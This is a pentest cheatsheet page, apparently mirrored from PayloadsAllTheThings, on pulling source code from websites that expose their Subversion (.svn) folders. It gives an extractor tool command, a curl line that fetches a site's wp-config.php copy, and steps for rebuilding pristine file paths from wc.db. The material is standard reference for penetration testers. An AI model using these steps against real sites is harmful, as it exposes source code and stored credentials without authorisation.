daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

subversion.md (2055B)


      1 ---
      2 title: "Subversion"
      3 topic: "Insecure Source Code Management"
      4 topicSlug: "insecure-source-code-management"
      5 sourcePath: "Insecure Source Code Management/Subversion.md"
      6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/Insecure%20Source%20Code%20Management/Subversion.md"
      7 sha: "3ac27901c711"
      8 isReadme: false
      9 ---
     10 
     11 # Subversion
     12 
     13 > Subversion  (often abbreviated as SVN) is a centralized version control system (VCS) that has been widely used in the software development industry. Originally developed by CollabNet Inc. in 2000, Subversion was designed to be an improved version of CVS (Concurrent Versions System) and has since gained significant traction for its robustness and reliability.
     14 
     15 ## Summary
     16 
     17 * [Tools](#tools)
     18 * [Methodology](#methodology)
     19 * [References](#references)
     20 
     21 ## Tools
     22 
     23 * [anantshri/svn-extractor](https://github.com/anantshri/svn-extractor) - Simple script to extract all web resources by means of .SVN folder exposed over network.
     24 
     25     ```powershell
     26     python svn-extractor.py --url "url with .svn available"
     27     ```
     28 
     29 ## Methodology
     30 
     31 ```powershell
     32 curl http://blog.domain.com/.svn/text-base/wp-config.php.svn-base
     33 ```
     34 
     35 1. Download the svn database from `http://server/path_to_vulnerable_site/.svn/wc.db`
     36 
     37     ```powershell
     38     INSERT INTO "NODES" VALUES(1,'trunk/test.txt',0,'trunk',1,'trunk/test.txt',2,'normal',NULL,NULL,'file',X'2829',NULL,'$sha1$945a60e68acc693fcb74abadb588aac1a9135f62',NULL,2,1456056344886288,'bl4de',38,1456056261000000,NULL,NULL);
     39     ```
     40 
     41 2. Download interesting files
     42     * remove `$sha1$` prefix
     43     * add `.svn-base` postfix
     44     * use first byte from hash as a subdirectory of the `pristine/` directory (`94` in this case)
     45     * create complete path, which will be: `http://server/path_to_vulnerable_site/.svn/pristine/94/945a60e68acc693fcb74abadb588aac1a9135f62.svn-base`
     46 
     47 ## References
     48 
     49 * [SVN Extractor for Web Pentesters - Anant Shrivastava - March 26, 2013](https://web.archive.org/web/20130329022536/http://blog.anantshri.info:80/svn-extractor-for-web-pentesters)